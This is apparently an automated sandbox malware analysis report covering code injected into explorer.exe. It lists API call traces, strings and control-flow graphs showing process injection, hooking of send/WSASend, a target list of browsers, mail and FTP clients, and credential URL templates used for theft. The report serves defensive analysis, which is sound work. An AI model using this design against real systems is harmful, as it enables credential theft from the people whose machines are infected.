                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0279111A
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0279112E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02791142
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02791156
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791166
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0279117A
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0279118E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 027911A2
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 027911B6
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 027911CA
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 027911DE
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 027911F2
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02791206
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02791216
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02791226
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02791236
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02791246
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02791256
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02791266
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02791276
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 027912B4
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0279130B
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0279131C
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02791327
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                                                              • API String ID: 3950187957-1680033604
                                                                                                                                                                                                              • Opcode ID: e1721f64c4813f4c0c5229c99abee81946b886444842a07f4276ab11bb8171b3
                                                                                                                                                                                                              • Instruction ID: cd7b00f7113e118f644eb880184c08a684c3497bb0800e94883cd635b57eac33
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1721f64c4813f4c0c5229c99abee81946b886444842a07f4276ab11bb8171b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F251B170A4430AA6EF10EBB1BC85E2F7BFC6F85784B840969FA45D3040EB30D4168E75

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 112 2797728-2797745 113 279774b-2797758 112->113 114 279790d 112->114 115 279776a-279776f 113->115 114->114 116 2797771 115->116 117 2797760-2797765 116->117 118 2797773 116->118 120 2797766-2797768 117->120 119 2797778-279777a 118->119 121 279777c-2797781 119->121 122 2797783-2797787 119->122 120->115 120->116 121->122 122->119 123 2797789 122->123 124 279778b-2797792 123->124 125 2797794-2797799 123->125 124->119 124->125 126 27977a8-27977aa 125->126 127 279779b-27977a4 125->127 130 27977ac-27977b1 126->130 131 27977b3-27977b7 126->131 128 279781a-279781d 127->128 129 27977a6 127->129 132 2797822-2797825 128->132 129->126 130->131 133 27977b9-27977be 131->133 134 27977c0-27977c2 131->134 137 2797827-2797829 132->137 133->134 135 27977e4-27977f3 134->135 136 27977c4 134->136 139 27977f5-27977fc 135->139 140 2797804-2797811 135->140 138 27977c5-27977c7 136->138 137->132 141 279782b-279782e 137->141 143 27977c9-27977ce 138->143 144 27977d0-27977d4 138->144 139->139 145 27977fe 139->145 140->140 146 2797813-2797815 140->146 141->132 142 2797830-279784c 141->142 142->137 147 279784e 142->147 143->144 144->138 148 27977d6 144->148 145->120 146->120 149 2797854-2797858 147->149 150 27977d8-27977df 148->150 151 27977e1 148->151 152 279785a-2797870 LoadLibraryA 149->152 153 279789f-27978a2 149->153 150->138 150->151 151->135 154 2797871-2797876 152->154 155 27978a5-27978ac 153->155 154->149 156 2797878-279787a 154->156 157 27978ae-27978b0 155->157 158 27978d0-2797900 VirtualProtect * 2 155->158 160 279787c-2797882 156->160 161 2797883-2797890 GetProcAddress 156->161 162 27978c3-27978ce 157->162 163 27978b2-27978c1 157->163 159 2797904-2797908 158->159 159->159 164 279790a 159->164 160->161 165 2797899-279789c 161->165 166 2797892-2797897 161->166 162->163 163->155 164->114 166->154
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002796000.00000040.80000000.00040000.00000000.sdmp, Offset: 02796000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2796000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 970bd59b6bf5d4f1aa8fc9161d8aff61f7fccd063dd4caa5612f9bfe87950d94
                                                                                                                                                                                                              • Instruction ID: ce9519dad6f14470f6e6a739bfc177bfe3aec251c018b083fad2d17e198082ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 970bd59b6bf5d4f1aa8fc9161d8aff61f7fccd063dd4caa5612f9bfe87950d94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B511AF1A643924FDF294B78EC80BB1FBA0DB42221B1D0679C5E5CB3C6E7945805C761

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 167 2792861-2792871 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0279286B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                              • Opcode ID: 41437db04885768c33c7075ee9d284919d13ca338c054ae07d948763cdfab2ac
                                                                                                                                                                                                              • Instruction ID: 3e6b977ef24b70db6769f69838a760e9fc063ff82158ba8ac38a945cc5928a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41437db04885768c33c7075ee9d284919d13ca338c054ae07d948763cdfab2ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05A00271D903407FDD4557A8A90FF553A2AA745701F4089847159C50509974585D8731

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792608: VirtualQuery.KERNEL32(02794434,?,0000001C), ref: 02792615
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0279184E
                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02791889
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02791919
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,02793428,00000016), ref: 02791940
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02791968
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02791978
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02791992
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0279199A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 027919A8
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 027919AF
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 027919C5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 027919CC
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 027919E2
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A0C
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A26
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A2D
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A41
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02791A58
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A65
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A71
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02791A74
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                              • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                                                                                              • API String ID: 1066286714-4141090125
                                                                                                                                                                                                              • Opcode ID: 1d4fd87372f5af9cf64439cf44d2821ba4a5c10b0305b58792a135262ad48a3d
                                                                                                                                                                                                              • Instruction ID: 11581cf7cbc006e4e6394654ead8f266492e6b6184f4148b3a2fb013f9911fca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4fd87372f5af9cf64439cf44d2821ba4a5c10b0305b58792a135262ad48a3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C961CD71A44305AFDB10DF24AC88E6BBBEDEF88754F404A58F949D3240DB30DD118BA6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0279265A
                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02792672
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 0279267A
                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02792685
                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0279269F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 027926B6
                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 027926CF
                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 027926D9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                              • Opcode ID: 376540b31b63fc5976d7ddb4a46d448ccba856669e9e4ae5a18b2d632267642c
                                                                                                                                                                                                              • Instruction ID: ca355cd103e0328d9aae9582d7999a34c00355f583d192d996a18da665a3a082
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 376540b31b63fc5976d7ddb4a46d448ccba856669e9e4ae5a18b2d632267642c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF113DB1D40208BFEB119B99EC88EAFBFBDEB44741F1084A5F605E2150D7718E22DB60

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
                                                                                                                                                                                                                • Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0279109E,?,02791010), ref: 0279134A
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000003,?,0279109E,?,02791010), ref: 0279135B
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02791372
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0279265A
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02792672
                                                                                                                                                                                                                • Part of subcall function 0279263E: lstrlen.KERNEL32(?,00000000), ref: 0279267A
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02792685
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0279269F
                                                                                                                                                                                                                • Part of subcall function 0279263E: wsprintfA.USER32 ref: 027926B6
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptDestroyHash.ADVAPI32(?), ref: 027926CF
                                                                                                                                                                                                                • Part of subcall function 0279263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 027926D9
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02791389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0279138F
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 027913A1
                                                                                                                                                                                                                • Part of subcall function 027924D5: GetCurrentProcessId.KERNEL32 ref: 027924E7
                                                                                                                                                                                                                • Part of subcall function 027924D5: GetCurrentThreadId.KERNEL32 ref: 027924EF
                                                                                                                                                                                                                • Part of subcall function 027924D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 027924FF
                                                                                                                                                                                                                • Part of subcall function 027924D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0279250D
                                                                                                                                                                                                                • Part of subcall function 027924D5: CloseHandle.KERNEL32(00000000), ref: 02792566
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 027913B8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 027913BF
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 027913E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 027913EB
                                                                                                                                                                                                                • Part of subcall function 02791DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02791E1D
                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0279141D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                                                                                              • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 706757162-1430290102
                                                                                                                                                                                                              • Opcode ID: 6074b262b3381813d9a2ca43655930ef0b9d28ee04fd13b41a5dfaf8da5e1298
                                                                                                                                                                                                              • Instruction ID: 1c1b8738bca5b58c153e6e0629ce795ad8c46284b42c73b8e1196c3ea2e5f36e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6074b262b3381813d9a2ca43655930ef0b9d28ee04fd13b41a5dfaf8da5e1298
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE316F31B80715BBEF117FA5BC1DB6F3B6BAF0A745F008454F90A96291CB7598228B90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 235 2791647-279165a 236 2791748-279174f 235->236 237 2791660-2791662 235->237 237->236 238 2791668-279166b 237->238 238->236 239 2791671-279167d lstrlen 238->239 240 2791683-279168a lstrlen 239->240 241 2791747 239->241 240->241 242 2791690-27916a8 getpeername 240->242 241->236 242->241 243 27916ae-27916ca inet_ntoa htons 242->243 243->241 244 27916cc-27916d4 243->244 245 2791708 244->245 246 27916d6-27916d9 244->246 247 279170d-279173c call 2792861 wsprintfA call 27924ae 245->247 248 27916db-27916de 246->248 249 27916f3-27916f8 246->249 247->241 259 279173e-2791745 call 2792843 247->259 251 2791701-2791706 248->251 252 27916e0-27916e3 248->252 249->247 251->247 254 27916fa-27916ff 252->254 255 27916e5-27916ea 252->255 254->247 255->249 257 27916ec-27916f1 255->257 257->241 257->249 259->241
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                                                                                              • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                                                                                              • API String ID: 3379139566-1703351401
                                                                                                                                                                                                              • Opcode ID: 5fa7a4903e886af1fbac1574062721c9f7277184488364c778b3684dc6aafd0c
                                                                                                                                                                                                              • Instruction ID: b8c5b631f9b4fb8181db29fd1bd51b43553f2d361499564c343c46cd0d370315
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fa7a4903e886af1fbac1574062721c9f7277184488364c778b3684dc6aafd0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89219735E0030BB7DF115EADAD885BF7AAB9B45245B4440B5E909E3251DB36C9218B50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 267 2791752-2791774 GetModuleHandleA GetProcAddress 268 27917c1-27917c6 267->268 269 2791776-27917c0 RtlZeroMemory * 4 267->269 269->268
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02791539,?,?,?,0279144B,?), ref: 02791763
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0279176A
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02794228,00000104), ref: 02791788
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02794118,00000104), ref: 02791790
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02794330,00000104), ref: 02791798
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02794000,00000104), ref: 027917A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                                                                                              • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                                                                                              • API String ID: 1490332519-278825019
                                                                                                                                                                                                              • Opcode ID: d176d02dfcbeb3419792eb86f668d4ffe558b58db737d6328e696590657a9a62
                                                                                                                                                                                                              • Instruction ID: 488dfa21ca959bac726ca4f99f0cbbe3da0d083d85f5798ad990461f5197e0d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d176d02dfcbeb3419792eb86f668d4ffe558b58db737d6328e696590657a9a62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0AEF2FC032C33BD1022AE7C1AC4BBF5CC555DEA3430191B5067320199A6681245F4

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 027924E7
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 027924EF
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 027924FF
                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 0279250D
                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0279252C
                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 0279253C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0279254B
                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 0279255B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02792566
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                              • Opcode ID: 74bcaf571410dc1bde0d3ae5d2c1ee98b1b7cc269f3f8db81674f3b7be262079
                                                                                                                                                                                                              • Instruction ID: 09548f11a37a1f43ad162a10fbf5920a3f6f68fe94a3af15c920dd7ff6ef0af7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74bcaf571410dc1bde0d3ae5d2c1ee98b1b7cc269f3f8db81674f3b7be262079
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D51182B1C44310EFDB00AF64A85CB7FBBA5FF45701F008999F94292141D731892A8BA2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 281 2791f4a-2791fa5 call 27922b8 call 2792861 call 27927e2 call 2792374 290 2791fc0-2791fcc 281->290 291 2791fa7-2791fbe 281->291 294 2791fd0-2791fd2 290->294 291->294 295 2791fd8-279200f RtlZeroMemory 294->295 296 27922a6-27922b5 call 2792843 294->296 300 279229e-27922a5 295->300 301 2792015-2792030 295->301 300->296 302 2792062-2792074 301->302 303 2792032-2792043 call 27922e5 301->303 310 2792078-279207a 302->310 308 2792045-2792054 303->308 309 2792056 303->309 311 2792058-2792060 308->311 309->311 312 279228b-2792291 310->312 313 2792080-27920dc call 2792731 310->313 311->310 315 279229a 312->315 316 2792293-2792295 call 2792843 312->316 321 27920e2-27920e7 313->321 322 2792284 313->322 315->300 316->315 323 27920e9-27920fa 321->323 324 2792101-279212f call 2792861 wsprintfW 321->324 322->312 323->324 327 2792148-279215f 324->327 328 2792131-2792133 324->328 334 279219e-27921b8 327->334 335 2792161-2792197 call 2792861 wsprintfW 327->335 329 2792134-2792137 328->329 330 2792139-279213e 329->330 331 2792142-2792144 329->331 330->329 333 2792140 330->333 331->327 333->327 339 27921be-27921d1 334->339 340 2792261-2792277 call 2792843 334->340 335->334 339->340 343 27921d7-27921ed call 2792861 339->343 348 2792279-279227b call 2792843 340->348 349 2792280 340->349 350 27921ef-27921fa 343->350 348->349 349->322 352 27921fc-2792209 call 2792826 350->352 353 279220e-2792225 350->353 352->353 357 2792229-2792236 353->357 358 2792227 353->358 357->350 359 2792238-279223c 357->359 358->357 360 279223e 359->360 361 2792256-279225d call 2792843 359->361 362 279223e call 2792815 360->362 361->340 364 2792243-2792250 RtlMoveMemory 362->364 364->361
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
                                                                                                                                                                                                                • Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B
                                                                                                                                                                                                                • Part of subcall function 027927E2: lstrlen.KERNEL32(027940DA,?,00000000,00000000,02791F86,74DE8A60,027940DA,00000000), ref: 027927EA
                                                                                                                                                                                                                • Part of subcall function 027927E2: MultiByteToWideChar.KERNEL32(00000000,00000000,027940DA,00000001,00000000,00000000), ref: 027927FC
                                                                                                                                                                                                                • Part of subcall function 02792374: RtlZeroMemory.NTDLL(?,00000018), ref: 02792386
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02791FE2
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0279211B
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02792186
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02792250
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                                                                                                              • Opcode ID: 882c75d8f1e7804324d863d590c345fdfe5d5be8a53308ccae1a22d2186dc7e8
                                                                                                                                                                                                              • Instruction ID: f0fb9afdfa0756a606dfb48a262ac8a96934aad3beaf860511f048386eadf380
